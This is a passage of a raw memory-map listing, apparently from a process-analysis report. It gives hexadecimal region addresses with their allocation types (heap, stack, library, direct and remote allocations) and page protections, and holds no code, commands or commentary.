3055000
trusted library allocation
page read and write
1C19F000
stack
page read and write
4C27000
heap
page read and write
1C2B1000
heap
page read and write
1A82F000
stack
page read and write
7FE89C44000
trusted library allocation
page read and write
7FE898B4000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
7FE8988B000
trusted library allocation
page read and write
351000
heap
page read and write
401000
heap
page read and write
7FE89A30000
trusted library allocation
page execute and read and write
2360000
heap
page execute and read and write
1C055000
heap
page read and write
625E000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
29CB000
trusted library allocation
page read and write
4C2E000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
4DCF000
heap
page read and write
1AA1C000
heap
page read and write
3780000
trusted library allocation
page read and write
4DA1000
heap
page read and write
6303000
heap
page read and write
4D5F000
heap
page read and write
7FE89890000
trusted library allocation
page read and write
303000
heap
page read and write
1D40000
heap
page read and write
4C7D000
heap
page read and write
3268000
trusted library allocation
page read and write
2E3000
heap
page read and write
4D5F000
heap
page read and write
287E000
trusted library allocation
page read and write
46DE000
heap
page read and write
7FFFFF81000
trusted library allocation
page execute read
10000
heap
page read and write
388000
heap
page read and write
35E000
heap
page read and write
4A70000
heap
page read and write
7FE898B3000
trusted library allocation
page execute and read and write
4D58000
heap
page read and write
1B0D0000
heap
page read and write
1C4EA000
heap
page read and write
12371000
trusted library allocation
page read and write
20000
heap
page read and write
1C537000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
3184000
trusted library allocation
page read and write
4F60000
heap
page read and write
2622000
trusted library allocation
page read and write
389E000
heap
page read and write
419C000
stack
page read and write
4F61000
heap
page read and write
4DA8000
heap
page read and write
3DC2000
heap
page read and write
2D40000
heap
page read and write
3DDC000
heap
page read and write
1F40000
direct allocation
page read and write
393000
heap
page read and write
7FE89BF1000
trusted library allocation
page read and write
2753000
trusted library allocation
page read and write
38F000
heap
page read and write
48D000
heap
page read and write
4C29000
heap
page read and write
2020000
heap
page execute and read and write
7FE89950000
trusted library allocation
page read and write
4DA4000
heap
page read and write
377A000
trusted library allocation
page read and write
132000
stack
page read and write
48C9000
heap
page read and write
486B000
heap
page read and write
1A6F8000
heap
page read and write
610000
heap
page read and write
488E000
heap
page read and write
2494000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
7FE89A20000
trusted library allocation
page read and write
4CF2000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
1CC7000
direct allocation
page read and write
30A000
heap
page read and write
3A2F000
trusted library allocation
page read and write
575000
heap
page read and write
2350000
heap
page execute and read and write
4737000
heap
page read and write
4859000
heap
page read and write
4778000
heap
page read and write
1E40000
direct allocation
page read and write
1AA38000
stack
page read and write
4FD9000
heap
page read and write
1A990000
heap
page read and write
1A7D4000
heap
page execute and read and write
7FE89B75000
trusted library allocation
page read and write
7FE89936000
trusted library allocation
page read and write
6391000
heap
page read and write
3DE6000
heap
page read and write
38D000
heap
page read and write
1C9000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
326E000
trusted library allocation
page read and write
2B7000
heap
page read and write
1C690000
trusted library section
page read and write
45C000
heap
page read and write
4C3B000
heap
page read and write
3DFA000
heap
page read and write
7FE89872000
trusted library allocation
page read and write
1A960000
heap
page read and write
4D4000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3179000
trusted library allocation
page read and write
37FF000
stack
page read and write
377A000
trusted library allocation
page read and write
126A8000
trusted library allocation
page read and write
1C53F000
heap
page read and write
7FE89A52000
trusted library allocation
page read and write
4852000
heap
page read and write
227000
heap
page read and write
1AC000
heap
page read and write
55B000
heap
page read and write
3B5A000
trusted library allocation
page read and write
523000
heap
page read and write
377A000
trusted library allocation
page read and write
3078000
trusted library allocation
page read and write
2465000
trusted library allocation
page read and write
1C37E000
stack
page read and write
4866000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
3894000
heap
page read and write
146000
heap
page read and write
3AD000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
3DD8000
heap
page read and write
2FE000
heap
page read and write
10000
heap
page read and write
12F7D000
trusted library allocation
page read and write
1B5EB000
heap
page read and write
3F8000
heap
page read and write
5172000
heap
page read and write
4A9C000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
1B570000
heap
page read and write
5169000
heap
page read and write
48B2000
heap
page read and write
3194000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
270000
heap
page read and write
27B0000
trusted library allocation
page read and write
536000
heap
page read and write
400000
heap
page read and write
7FE89A3C000
trusted library allocation
page read and write
5A6000
heap
page read and write
1EE0000
direct allocation
page read and write
2BF000
heap
page read and write
434000
heap
page read and write
4816000
heap
page read and write
35D3000
heap
page read and write
3271000
trusted library allocation
page read and write
62EC000
heap
page read and write
2EA000
heap
page read and write
2667000
trusted library allocation
page read and write
7FE89C60000
trusted library allocation
page read and write
4F88000
heap
page read and write
36C0000
heap
page read and write
710000
heap
page read and write
5179000
heap
page read and write
4D0000
heap
page read and write
473D000
heap
page read and write
2824000
heap
page read and write
2A1E000
stack
page read and write
10000
heap
page read and write
4C39000
heap
page read and write
3DDA000
heap
page read and write
326A000
trusted library allocation
page read and write
1A6F4000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3173000
trusted library allocation
page read and write
25D000
heap
page read and write
7FE89A67000
trusted library allocation
page read and write
1C00E000
stack
page read and write
10000
heap
page read and write
5167000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
4AA5000
heap
page read and write
535000
heap
page read and write
1AD000
heap
page read and write
110000
heap
page read and write
1D00000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
2D2000
heap
page read and write
4D67000
heap
page read and write
7FE89BF9000
trusted library allocation
page read and write
1F80000
direct allocation
page read and write
24F000
heap
page read and write
35B9000
heap
page read and write
5178000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
4C2A000
heap
page read and write
3ED000
heap
page read and write
4D70000
heap
page read and write
20000
heap
page read and write
1AE1F000
stack
page read and write
1C566000
heap
page read and write
1A739000
heap
page read and write
1AF8F000
stack
page read and write
1AC90000
heap
page read and write
3B9000
heap
page read and write
35B9000
heap
page read and write
2A70000
trusted library allocation
page execute read
1A745000
heap
page read and write
6327000
heap
page read and write
1B19F000
stack
page read and write
63E4000
heap
page read and write
4DB0000
heap
page read and write
555000
heap
page read and write
1C8000
heap
page read and write
1EBF000
stack
page read and write
4C3D000
heap
page read and write
1C25B000
heap
page read and write
3A2F000
trusted library allocation
page read and write
7FE89940000
trusted library allocation
page execute and read and write
3A2F000
trusted library allocation
page read and write
3DC4000
heap
page read and write
4FD9000
heap
page read and write
469000
heap
page read and write
3DC7000
heap
page read and write
4D0000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
1B03E000
stack
page read and write
7FE89BB0000
trusted library allocation
page read and write
2AA3000
trusted library allocation
page read and write
2855000
trusted library allocation
page read and write
1E3A000
stack
page read and write
363C000
heap
page read and write
3812000
heap
page read and write
502000
heap
page read and write
327E000
trusted library allocation
page read and write
3750000
trusted library allocation
page execute
7FE89AC0000
trusted library allocation
page read and write
3A10000
trusted library allocation
page read and write
1A9C2000
heap
page read and write
1AF3B000
heap
page read and write
4EE000
heap
page read and write
3899000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
56C000
heap
page read and write
2244000
heap
page read and write
FBE000
stack
page read and write
353000
heap
page read and write
3D8D000
heap
page read and write
51E000
heap
page read and write
3A2F000
trusted library allocation
page read and write
35C0000
heap
page read and write
1E7000
heap
page read and write
1E7000
heap
page read and write
3E6000
heap
page read and write
34A0000
trusted library allocation
page read and write
5176000
heap
page read and write
424000
heap
page read and write
3DD7000
heap
page read and write
29A3000
trusted library allocation
page read and write
410000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
4A9C000
heap
page read and write
1CA6E000
stack
page read and write
1D74000
heap
page read and write
58D000
heap
page read and write
1C6EF000
stack
page read and write
1C34E000
stack
page read and write
3177000
trusted library allocation
page read and write
280000
heap
page read and write
2AC6000
trusted library allocation
page read and write
363C000
heap
page read and write
26EF000
trusted library allocation
page read and write
1C372000
heap
page read and write
1B10F000
stack
page read and write
41A0000
trusted library allocation
page read and write
411F000
trusted library allocation
page read and write
1A7D8000
heap
page execute and read and write
2E1000
heap
page read and write
7FE898B4000
trusted library allocation
page read and write
3DE8000
heap
page read and write
377A000
trusted library allocation
page read and write
12451000
trusted library allocation
page read and write
7FE898FC000
trusted library allocation
page execute and read and write
3888000
heap
page read and write
2DF000
heap
page read and write
1D00000
direct allocation
page read and write
3B5A000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
3DC4000
heap
page read and write
38E000
heap
page read and write
417000
heap
page read and write
266000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
4DAB000
heap
page read and write
330000
heap
page read and write
3E01000
heap
page read and write
1BE6000
heap
page read and write
26BF000
trusted library allocation
page read and write
2AA7000
trusted library allocation
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
2A5F000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
1AF00000
heap
page read and write
3832000
heap
page read and write
293000
heap
page read and write
1D20000
heap
page read and write
6282000
heap
page read and write
3DE5000
heap
page read and write
2451000
trusted library allocation
page read and write
10000
heap
page read and write
2536000
trusted library allocation
page read and write
4FA0000
heap
page read and write
2D4A000
stack
page read and write
1242F000
trusted library allocation
page read and write
327D000
trusted library allocation
page read and write
3DDA000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
1A840000
heap
page execute and read and write
3182000
trusted library allocation
page read and write
4A31000
heap
page read and write
355A000
heap
page read and write
16B000
heap
page read and write
48D000
direct allocation
page read and write
306000
heap
page read and write
1CC0000
direct allocation
page read and write
1FA7000
direct allocation
page read and write
3E06000
heap
page read and write
4FDB000
heap
page read and write
47A000
heap
page read and write
123F1000
trusted library allocation
page read and write
2F0000
heap
page read and write
645A000
heap
page read and write
3BF000
heap
page read and write
4E6000
heap
page read and write
3C0000
heap
page read and write
4C2D000
heap
page read and write
264000
heap
page read and write
7FE89C28000
trusted library allocation
page read and write
4D6B000
heap
page read and write
2471000
trusted library allocation
page read and write
3DDE000
heap
page read and write
381E000
heap
page read and write
1236F000
trusted library allocation
page read and write
245D000
trusted library allocation
page read and write
1E1000
heap
page read and write
2E0000
heap
page read and write
2D4000
heap
page read and write
7FE89AA0000
trusted library allocation
page execute and read and write
3888000
heap
page read and write
355F000
heap
page read and write
4890000
heap
page read and write
2CB0000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
3190000
heap
page read and write
1A360000
heap
page read and write
1A5DF000
stack
page read and write
19B000
stack
page read and write
3A1000
heap
page read and write
51AA000
heap
page read and write
27D000
heap
page read and write
3A2F000
trusted library allocation
page read and write
3D32000
heap
page read and write
4866000
heap
page read and write
51A9000
heap
page read and write
3DDE000
heap
page read and write
1A844000
heap
page execute and read and write
13322000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
3A1000
heap
page read and write
340000
heap
page read and write
4D67000
heap
page read and write
2888000
trusted library allocation
page read and write
2E1000
heap
page read and write
1C0000
heap
page read and write
3EF0000
trusted library allocation
page read and write
7FE89AB8000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
4D4000
heap
page read and write
2A0A000
trusted library allocation
page read and write
4D5000
heap
page read and write
4DCE000
heap
page read and write
456000
heap
page read and write
4882000
heap
page read and write
7FE89A5C000
trusted library allocation
page read and write
16D000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
3DE0000
heap
page read and write
1A450000
heap
page read and write
535000
heap
page read and write
1EC0000
direct allocation
page read and write
7FFFFF88000
trusted library allocation
page readonly
12556000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
46E3000
heap
page read and write
12C8A000
trusted library allocation
page read and write
1C5000
heap
page read and write
1E80000
heap
page read and write
1A578000
heap
page execute and read and write
377A000
trusted library allocation
page read and write
2E3000
heap
page read and write
486B000
heap
page read and write
12648000
trusted library allocation
page read and write
1C4DB000
heap
page read and write
555000
heap
page read and write
4DD000
heap
page read and write
550000
heap
page read and write
1D3B000
heap
page read and write
3175000
trusted library allocation
page read and write
26E1000
trusted library allocation
page read and write
1B2A0000
heap
page read and write
502A000
heap
page read and write
27C2000
trusted library allocation
page read and write
3B5A000
trusted library allocation
page read and write
1C580000
heap
page read and write
30E000
heap
page read and write
4485000
trusted library allocation
page read and write
7FE89C50000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
1C8000
heap
page read and write
1B53D000
stack
page read and write
3B5A000
trusted library allocation
page read and write
1A505000
heap
page read and write
2E4B000
stack
page read and write
3829000
heap
page read and write
2475000
trusted library allocation
page read and write
48C9000
heap
page read and write
2A45000
heap
page read and write
1D0000
heap
page read and write
1A6F2000
heap
page read and write
2A65000
trusted library allocation
page read and write
A9E000
stack
page read and write
35B9000
heap
page read and write
3D44000
heap
page read and write
519000
heap
page read and write
317D000
trusted library allocation
page read and write
6333000
heap
page read and write
355B000
heap
page read and write
208000
heap
page read and write
2872000
trusted library allocation
page read and write
3DE0000
heap
page read and write
470000
heap
page read and write
1EE7000
direct allocation
page read and write
3CA4000
heap
page read and write
3DD4000
heap
page read and write
418000
heap
page read and write
2F5000
stack
page read and write
29C000
heap
page read and write
377A000
trusted library allocation
page read and write
3F5000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
4DAA000
heap
page read and write
3DC4000
heap
page read and write
3892000
heap
page read and write
1A5B4000
heap
page read and write
1C050000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
4D6B000
heap
page read and write
12431000
trusted library allocation
page read and write
1A428000
heap
page execute and read and write
436000
heap
page read and write
4C25000
heap
page read and write
7FE8993E000
trusted library allocation
page execute and read and write
7FE89960000
trusted library allocation
page execute and read and write
7FE89BE0000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
23E000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
35D3000
heap
page read and write
3A2F000
trusted library allocation
page read and write
1B96000
heap
page read and write
4490000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
35E9000
heap
page read and write
C0000
trusted library allocation
page read and write
214000
heap
page read and write
1B1F0000
heap
page read and write
3521000
trusted library allocation
page read and write
2AAB000
trusted library allocation
page read and write
288000
heap
page read and write
4847000
heap
page read and write
37A0000
heap
page read and write
4818000
heap
page read and write
F0000
heap
page read and write
5719000
heap
page read and write
37C5000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
4AD000
heap
page read and write
1D90000
trusted library allocation
page read and write
ED000
heap
page read and write
4778000
heap
page read and write
1B0BF000
stack
page read and write
487A000
heap
page read and write
309000
heap
page read and write
192000
stack
page read and write
535000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
3B9000
heap
page read and write
2938000
trusted library allocation
page read and write
4C38000
heap
page read and write
4C0000
heap
page read and write
388B000
heap
page read and write
339E000
stack
page read and write
3D49000
heap
page read and write
473000
direct allocation
page read and write
1C4BD000
heap
page read and write
1C295000
heap
page read and write
3400000
trusted library allocation
page execute
4C3D000
heap
page read and write
1A6DB000
heap
page read and write
1B480000
heap
page read and write
1A7D0000
heap
page execute and read and write
1B00E000
stack
page read and write
3E06000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
1ACAC000
heap
page read and write
1B048000
stack
page read and write
3DC7000
heap
page read and write
3DC0000
heap
page read and write
4DCC000
heap
page read and write
30FE000
stack
page read and write
1D05000
heap
page read and write
299F000
trusted library allocation
page read and write
51A5000
heap
page read and write
327A000
trusted library allocation
page read and write
29E4000
trusted library allocation
page read and write
48BF000
heap
page read and write
461000
heap
page read and write
4490000
trusted library allocation
page read and write
7FE89956000
trusted library allocation
page execute and read and write
4D9000
heap
page read and write
4C37000
heap
page read and write
104000
heap
page read and write
3DE0000
heap
page read and write
1C2C8000
heap
page read and write
377A000
trusted library allocation
page read and write
1BB0000
heap
page read and write
34E000
heap
page read and write
4D63000
heap
page read and write
3A2F000
trusted library allocation
page read and write
1ADE8000
stack
page read and write
7FE89B40000
trusted library allocation
page read and write
1A544000
heap
page execute and read and write
1A80E000
heap
page execute and read and write
3B5D000
trusted library allocation
page read and write
4DB000
heap
page read and write
40C000
heap
page read and write
1C8000
heap
page read and write
232E000
heap
page execute and read and write
3DFA000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
4895000
heap
page read and write
46E3000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
3DC0000
heap
page read and write
37F000
heap
page read and write
1E0E000
stack
page read and write | page guard
1AA6E000
stack
page read and write
3A2F000
trusted library allocation
page read and write
164000
heap
page read and write
4A70000
heap
page read and write
2C40000
remote allocation
page read and write
1C490000
heap
page read and write
1A737000
heap
page read and write
1B0000
heap
page read and write
4DCC000
heap
page read and write
224F000
stack
page read and write
270000
heap
page read and write
1ACB4000
heap
page read and write
444000
heap
page read and write
7FE8996C000
trusted library allocation
page execute and read and write
2A27000
trusted library allocation
page read and write
2354000
heap
page read and write
4CF1000
heap
page read and write
7FE89C21000
trusted library allocation
page read and write
3829000
heap
page read and write
536000
heap
page read and write
1B8000
heap
page read and write
377A000
trusted library allocation
page read and write
3B60000
trusted library allocation
page read and write
12430000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
420000
heap
page read and write
1D77000
heap
page read and write
12421000
trusted library allocation
page read and write
1E40000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
48F000
direct allocation
page read and write
2CD000
heap
page read and write
3EEE000
stack
page read and write
7FE89874000
trusted library allocation
page read and write
4D62000
heap
page read and write
268000
heap
page read and write
7FE89976000
trusted library allocation
page execute and read and write
1B09F000
stack
page read and write
2680000
trusted library allocation
page read and write
7FE8989B000
trusted library allocation
page read and write
7FE89A63000
trusted library allocation
page read and write
4DA6000
heap
page read and write
4D5F000
heap
page read and write
3053000
trusted library allocation
page read and write
1B37B000
stack
page read and write
1A6D2000
heap
page read and write
389E000
heap
page read and write
389E000
heap
page read and write
3190000
heap
page read and write
6B0000
direct allocation
page read and write
7FE89926000
trusted library allocation
page read and write
200F000
stack
page read and write
403000
heap
page read and write
317B000
trusted library allocation
page read and write
4DA000
heap
page read and write
4AA9000
heap
page read and write
4FDC000
heap
page read and write
7FE89A92000
trusted library allocation
page read and write
1C8C0000
heap
page read and write
7FE89892000
trusted library allocation
page read and write
535000
heap
page read and write
1B25B000
heap
page read and write
62BD000
heap
page read and write
1C29E000
stack
page read and write
2EE000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
6413000
heap
page read and write
3EF0000
trusted library allocation
page read and write
4CE000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
4A9B000
heap
page read and write
231F000
stack
page read and write
3D8D000
heap
page read and write
4C32000
heap
page read and write
47CC000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1270D000
trusted library allocation
page read and write
4F87000
heap
page read and write
1CF4000
heap
page read and write
3959000
heap
page read and write
1A5000
heap
page read and write
3B5A000
trusted library allocation
page read and write
246F000
trusted library allocation
page read and write
1D50000
heap
page read and write
63FB000
heap
page read and write
143000
stack
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
6299000
heap
page read and write
535000
heap
page read and write
360000
heap
page read and write
2EF000
trusted library allocation
page read and write
27A6000
trusted library allocation
page read and write
51A000
heap
page read and write
1B47B000
stack
page read and write
4CB000
heap
page read and write
53A000
heap
page read and write
1FB3000
direct allocation
page read and write
7FE89A62000
trusted library allocation
page read and write
7FE89966000
trusted library allocation
page read and write
4DAF000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
309000
heap
page read and write
3A90000
trusted library allocation
page read and write
1A70F000
heap
page read and write
1B13E000
stack
page read and write
305B000
trusted library allocation
page read and write
46DA000
heap
page read and write
7FE89C3A000
trusted library allocation
page read and write
495000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
23F000
heap
page read and write
623B000
heap
page read and write
4C32000
heap
page read and write
4CF3000
heap
page read and write
38A0000
heap
page read and write
7FE898B2000
trusted library allocation
page read and write
1B5F7000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
3A60000
trusted library allocation
page read and write
7FE89884000
trusted library allocation
page read and write
495000
heap
page read and write
1D0000
heap
page read and write
262000
heap
page read and write
49A000
heap
page read and write
9A0000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
3E8000
stack
page read and write
DEF000
stack
page read and write
35BB000
heap
page read and write
4D9000
heap
page read and write
3265000
trusted library allocation
page read and write
4DA1000
heap
page read and write
1E1000
heap
page read and write
3540000
heap
page read and write
1256E000
trusted library allocation
page read and write
1D14000
heap
page read and write
23A0000
heap
page execute and read and write
1A9EF000
heap
page read and write
1C4000
heap
page read and write
5031000
heap
page read and write
4C26000
heap
page read and write
9E0000
heap
page read and write
326A000
trusted library allocation
page read and write
1FB3000
direct allocation
page read and write
3872000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
4DE000
heap
page read and write
495000
heap
page read and write
3CB000
heap
page read and write
6252000
heap
page read and write
356000
heap
page read and write
1D20000
direct allocation
page read and write
1FA7000
direct allocation
page read and write
2AC7000
trusted library allocation
page read and write
7FE89AB4000
trusted library allocation
page read and write
1CF0000
heap
page read and write
7FE8996C000
trusted library allocation
page execute and read and write
1C8000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3F5000
heap
page read and write
28B9000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
51A5000
heap
page read and write
1C430000
heap
page read and write
377A000
trusted library allocation
page read and write
4C29000
heap
page read and write
4D67000
heap
page read and write
644E000
heap
page read and write
7FE89AB8000
trusted library allocation
page read and write
62C000
heap
page read and write
200000
heap
page read and write
362000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
B80000
heap
page read and write
488000
heap
page read and write
1A0000
heap
page read and write
3A2F000
trusted library allocation
page read and write
7FFFFF82000
trusted library allocation
page readonly
2865000
trusted library allocation
page read and write
AE0000
heap
page read and write
273C000
trusted library allocation
page read and write
1E60000
direct allocation
page read and write
14D000
heap
page read and write
1C7BE000
stack
page read and write
3272000
trusted library allocation
page read and write
3277000
trusted library allocation
page read and write
4DA3000
heap
page read and write
3DB000
heap
page read and write
2FF000
trusted library allocation
page read and write
7FE89930000
trusted library allocation
page read and write
4DCC000
heap
page read and write
1AF05000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
3BC000
heap
page read and write
1C65000
heap
page read and write
21E0000
heap
page read and write
1A4ED000
stack
page read and write
4CB7000
heap
page read and write
4FA0000
heap
page read and write
1264D000
trusted library allocation
page read and write
1EE7000
direct allocation
page read and write
1B21C000
stack
page read and write
3F7000
heap
page read and write
4DCC000
heap
page read and write
3057000
trusted library allocation
page read and write
35D3000
heap
page read and write
7FE89A22000
trusted library allocation
page read and write
4CB000
heap
page read and write
7FE898CB000
trusted library allocation
page read and write
1E0F000
stack
page read and write
3800000
heap
page read and write
3E01000
heap
page read and write
3A2F000
trusted library allocation
page read and write
4852000
heap
page read and write
3D49000
heap
page read and write
2224000
heap
page read and write
1C0000
heap
page read and write
377A000
trusted library allocation
page read and write
40F000
trusted library allocation
page read and write
3DC2000
heap
page read and write
1C4DF000
stack
page read and write
444000
heap
page read and write
3FA000
heap
page read and write
46E1000
heap
page read and write
1A570000
heap
page execute and read and write
250000
trusted library allocation
page read and write
4DA4000
heap
page read and write
160000
trusted library allocation
page read and write
4FD9000
heap
page read and write
495000
heap
page read and write
1C38F000
stack
page read and write
3A2F000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
1AC000
heap
page read and write
1AF6E000
stack
page read and write
318F000
stack
page read and write
7FE89AD0000
trusted library allocation
page read and write
1B5F3000
heap
page read and write
642A000
heap
page read and write
1B225000
heap
page read and write
4C39000
heap
page read and write
1A838000
stack
page read and write
4D67000
heap
page read and write
23B0000
heap
page read and write
1246D000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
1B0FF000
stack
page read and write
3DB2000
heap
page read and write
2AA9000
trusted library allocation
page read and write
220000
heap
page read and write
40E000
heap
page read and write
4F68000
heap
page read and write
21A0000
heap
page read and write
3899000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89AB4000
trusted library allocation
page read and write
3FF000
heap
page read and write
395A000
heap
page read and write
3C70000
trusted library allocation
page read and write
5193000
heap
page read and write
4A0000
heap
page read and write
6362000
heap
page read and write
7FE89A92000
trusted library allocation
page read and write
3F5000
heap
page read and write
12443000
trusted library allocation
page read and write
4CF3000
heap
page read and write
4143000
trusted library allocation
page read and write
4DA1000
heap
page read and write
1CC000
stack
page read and write
1B256000
heap
page read and write
1A829000
stack
page read and write
27B000
heap
page read and write
1C08B000
heap
page read and write
1AFCE000
stack
page read and write
3A2F000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
1B350000
heap
page read and write
16B000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
3173000
trusted library allocation
page read and write
7FE89986000
trusted library allocation
page execute and read and write
348000
heap
page read and write
1D50000
heap
page execute and read and write
4AA5000
heap
page read and write
1A66A000
stack
page read and write
3AA0000
trusted library allocation
page read and write
444E000
stack
page read and write
7FE8989D000
trusted library allocation
page execute and read and write
363F000
heap
page read and write
1C2F1000
heap
page read and write
12361000
trusted library allocation
page read and write
7FE89A47000
trusted library allocation
page read and write
10000
heap
page read and write
2E1000
heap
page read and write
1C5000
heap
page read and write
37F000
heap
page read and write
12451000
trusted library allocation
page read and write
2B6000
heap
page read and write
555000
heap
page read and write
7FE89C14000
trusted library allocation
page read and write
7FE89A84000
trusted library allocation
page read and write
1B0EF000
heap
page read and write
1CDD000
direct allocation
page read and write
3B0D000
trusted library allocation
page read and write
1C56000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
4818000
heap
page read and write
2E9000
heap
page read and write
3C9000
heap
page read and write
2AA5000
trusted library allocation
page read and write
384000
heap
page read and write
1AAEE000
stack
page read and write
7FE89BB9000
trusted library allocation
page read and write
1BA000
heap
page read and write
1A69B000
heap
page read and write
2A8B000
trusted library allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
3DC7000
heap
page read and write
1AC000
heap
page read and write
5193000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
2A4000
heap
page read and write
317D000
trusted library allocation
page read and write
2AD000
heap
page read and write
340000
heap
page read and write
7FFFFF83000
trusted library allocation
page execute read
2B20000
heap
page read and write
1D44000
heap
page read and write
296B000
trusted library allocation
page read and write
2A40000
heap
page read and write
4DA6000
heap
page read and write
4DA8000
heap
page read and write
48B1000
heap
page read and write
1C20000
heap
page read and write
21CE000
stack
page read and write
16D000
stack
page read and write
3872000
heap
page read and write
7FE89A33000
trusted library allocation
page read and write
272000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
4F61000
heap
page read and write
3730000
trusted library allocation
page read and write
3DB7000
heap
page read and write
1AD82000
heap
page read and write
26BD000
trusted library allocation
page read and write
62C8000
heap
page read and write
62B1000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
320000
heap
page read and write
63EF000
heap
page read and write
1E2000
heap
page read and write
1B0D6000
heap
page read and write
3DE1000
heap
page read and write
630F000
heap
page read and write
439000
heap
page read and write
4866000
heap
page read and write
1A681000
heap
page read and write
3DC7000
heap
page read and write
488E000
heap
page read and write
326000
heap
page read and write
3B5D000
trusted library allocation
page read and write
7FE8993C000
trusted library allocation
page execute and read and write
4D6B000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
5031000
heap
page read and write
4818000
heap
page read and write
5031000
heap
page read and write
7FE89A6C000
trusted library allocation
page read and write
3DE7000
heap
page read and write
62F8000
heap
page read and write
16B000
heap
page read and write
35C0000
heap
page read and write
3B5A000
trusted library allocation
page read and write
7FE89A30000
trusted library allocation
page read and write
1A5CC000
heap
page read and write
4F61000
heap
page read and write
4DC000
heap
page read and write
38A000
heap
page read and write
20000
heap
page read and write
12391000
trusted library allocation
page read and write
4D9000
heap
page read and write
3DB2000
heap
page read and write
3F6000
heap
page read and write
16E000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
200000
heap
page read and write
1B96000
heap
page read and write
1252D000
trusted library allocation
page read and write
4FD9000
heap
page read and write
327C000
trusted library allocation
page read and write
2E9000
heap
page read and write
327A000
trusted library allocation
page read and write
1AFA8000
heap
page read and write
3BF000
heap
page read and write
1C51E000
stack
page read and write
10000
heap
page read and write
4DAF000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
51A5000
heap
page read and write
1C620000
heap
page read and write
15B000
stack
page read and write
C80000
heap
page read and write
535000
heap
page read and write
7FE89C0A000
trusted library allocation
page read and write
1B69C000
stack
page read and write
1C8000
heap
page read and write
1E7000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
4E6000
heap
page read and write
1C2000
heap
page read and write
51A7000
heap
page read and write
4E4000
heap
page read and write
4A99000
heap
page read and write
636E000
heap
page read and write
C0000
trusted library allocation
page read and write
1A5FF000
stack
page read and write
5031000
heap
page read and write
2E1000
heap
page read and write
4D67000
heap
page read and write
309000
heap
page read and write
1AD39000
heap
page read and write
2E9000
heap
page read and write
5710000
heap
page read and write
46ED000
heap
page read and write
1B520000
heap
page read and write
3A5000
heap
page read and write
223000
stack
page read and write
4EF9000
heap
page read and write
1C585000
heap
page read and write
1B1DF000
stack
page read and write
3DF000
